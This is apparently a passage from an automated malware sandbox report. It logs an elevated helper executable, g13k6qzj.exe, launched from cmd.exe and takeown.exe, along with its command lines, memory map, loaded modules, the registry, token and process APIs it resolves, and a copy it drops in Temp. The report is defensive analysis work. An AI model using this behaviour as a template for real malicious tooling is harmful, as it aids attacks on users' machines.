| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #215: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #215 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:23, Reason: Child Process |
| Unmonitor | End Time: 00:03:27, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7a0 |
| Parent PID | 0xf08 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
390
0x
E44
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x00610000 | 0x00639fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x01ceffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001cf0000 | 0x01cf0000 | 0x01edffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:35 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #216: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #216 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "JNTFiltr.dll.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:23, Reason: Child Process |
| Unmonitor | End Time: 00:03:26, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x300 |
| Parent PID | 0x118 (c:\windows\syswow64\takeown.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
90C
0x
7B4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
